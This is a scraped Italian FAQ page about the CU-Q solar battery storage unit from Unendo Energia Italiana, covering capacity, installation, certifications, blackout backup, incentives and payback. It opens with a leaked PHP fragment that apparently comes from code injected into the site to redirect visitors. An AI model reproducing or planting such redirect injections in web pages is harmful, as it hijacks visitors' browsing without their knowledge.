$str="Location: ".$loc."";header($str);die();}}}main123($sfnusdihfudsksds);?> FAQ | Unendo Energia Italiana

FAQ

Fotovoltaico & CU-Q

Che cos’è un sistema di accumulo e come funziona?

Un sistema di accumulo è un dispositivo completamente automatico che permette di utilizzare l’energia elettrica solare prodotta di giorno anche la sera, quando i consumi delle famiglie sono più alti.
– Il CU-Q permette di raggiungere valori di autoconsumo di energia elettrica fino al 90% con conseguente riduzione dei prelievi di energia dalla rete.
– Se la casa necessita di maggiore energia la sera, il CU-Q ti permette di utilizzare in modo automatico l’energia accumulata nelle batterie senza l’ausilio della rete elettrica nazionale.

– Di giorno, l’impianto fotovoltaico produce energia elettrica e soddisfa prioritariamente i fabbisogni dell’abitazione – durante le fasi di assorbimento minimo, carica le batterie. Le eccedenze di energia prodotta, vengono immesse automaticamente nella rete elettrica nazionale.

– Quando le batterie si sono scaricate, non vengono caricate prelevando energia dalla rete, ma attendono il sorgere del Sole per ricaricarsi direttamente dai moduli fotovoltaici, in modo da sfruttare al meglio la propria energia rinnovabile.

Quali sono le certificazioni del CU-Q?

Il CU-Q, compatibilmente alla versione V1 della CEI 0-21 del 23/12/2014 e la Delibera AEEGSI 574/14 e 642/14, è conforme alle CEI EN 62040 -1, CEI EN 62040 – 3 e CEI EN 50272-2.

il CU-Q può essere installato su un impianto fotovoltaico nuovo?

Il CU-Q può essere abbinato a tutti i nuovi sistemi fotovoltaici. Unendo Energia Italiana, per proporre la miglior tecnologia disponibile oggi nello sfruttamento dell’energia solare, è divenuta partner strategica di Solar Frontier, produttore giapponese di moduli CIS. Tale tecnologia, che permette una produzione annuale superiore del 15% rispetto alla tecnologia policristallina, consente di utilizzare al meglio le potenzialità del CU-Q per gli usi dell’abitazione.

Quali potenze possono essere installate con i moduli Solar Frontier abbinati al CU-Q?

Unendo Energia Italiana propone per il settore domestico, tre profili di potenza:

2,97 kWp;

4,76 kWp;

5,94 kWp.
I tre profili sono in grado di soddisfare tutte le richieste di energia elettrica di una casa.

Il CU-Q può essere installato su un impianto fotovoltaico esistente?

Si, il sistema è compatibile con tutti i sistemi fotovoltaici, anche con quelli incentivati nel Conto Energia ad eccezione del I °. Il CU-Q è inoltre compatibile con tutti i regimi di ritiro dell’energia come lo Scambio sul Posto, il Ritiro Dedicato e la Tariffa Omnicomprensiva.

Che lavorazioni sono previste per l’installazione del CU-Q?

L’installazione del CU-Q è molto semplice e richiede circa 2 ore di tempo nelle installazioni standard. Il CU-Q viene inserito elettricamente tra il contatore di produzione ed il contatore di scambio, con una semplice derivazione dal quadro elettrico dell’abitazione.

Quali sono gli ingombri del CU-Q?

Le dimensioni di ingombro del CU-Q sono le seguenti:

137 cm altezza

40 cm larghezza

92 cm lunghezza

Le batterie presenti nel CU-Q che vita hanno e quando cominciano a diminuire le prestazioni?

Le batterie del CU-Q hanno una durata media di 6-7 anni (pari a circa 1000 cicli completi); successivamente iniziano a degradare. Per questo motivo Unendo Energia Italiana dà la possibilità di estendere la garanzia standard (sul CU-Q e le batterie) da 5 a 10 anni, in modo tale che il Cliente che acquista il prodotto non abbia altro pensiero che trovare il modo migliore di utilizzare la propria energia rinnovabile.

Qual è la capacità di accumulo prevista per il CU-Q?

La capacità di accumulo è di 9,6 kWh nominali con profondità di scarica al 50%.

Il CU-Q rilascia la corrente elettrica solo di notte oppure ogni qualvolta quella prodotta dall'impianto fotovoltaico non sia sufficiente?

Il CU-Q entra in funzione automaticamente e soddisfa le esigenze della casa usando l’energia accumulata nelle batterie ogni qualvolta l’impianto fotovoltaico non riesca ad erogare energia elettrica.

Il passaggio dall’utilizzo dell’energia elettrica generata dall’impianto fotovoltaico a quella del CU-Q o a quella prelevata dalla la rete elettrica nazionale, avviene in modo automatico?

Il CU-Q gestisce i flussi energetici della casa in modo autonomo e non necessita di alcun intervento da parte dell’utilizzatore; i cambi di utilizzo dell’energia elettrica tra la rete elettrica nazionale, impianto fotovoltaico e batterie, avvengono automaticamente ed istantaneamente senza alcuna interruzione di tensione e corrente all’interno dell’abitazione. Pertanto usando il CU-Q non si verificheranno mai cali di tensione o mancanza di corrente sia di giorno con l’utilizzo del sistema integrato di impianto fotovoltaico abbinato al CU-Q, sia di notte in abbinamento alla rete elettrica nazionale.

Cosa succede in caso di blackout della rete?

In caso di blackout della rete, l’abitazione continuerà ad essere illuminata grazie al CU-Q che erogherà energia elettrica fino al completo esaurimento di carica delle batterie. I nostri studi hanno evidenziato che l’autonomia arriva a coprire le successive 24h.

Quale potenza eroga il CU-Q?

Il CU-Q eroga una potenza di 3000 VA, il CU-Q Plus 5000 VA (circa 3 kW e 5 kW rispettivamente).

Il CU-Q usufruisce di incentivi e/o agevolazioni statali?

Il CU-Q rientra nelle agevolazioni fiscali del 50% per le ristrutturazioni edilizie. Ciò permette di recuperare il 50% del costo del CU-Q in 10 anni.

In quanto tempo si ripaga l’investimento per l'acquisto del CU-Q?

Il CU-Q permette di raggiungere un livello di autoconsumo di energia solare pari al 90% del fabbisogno di un’abitzione. Il CU-Q, installato su impianti nuovi o già esistenti, si ripaga mediamente in 5/6 anni, in base al profilo di consumo dell’abitazione. Se nel corso del tempo l’utilizzatore dovesse impiegare l’energia elettrica anche per il riscaldamento (es. pompe di calore) o altre applicazioni spostando il fabbisogno energetico da altre fonti, come il gas metano, all’energia elettrica, il tempo di rientro dell’investimento del CU-Q si ridurrebbe ulteriormente.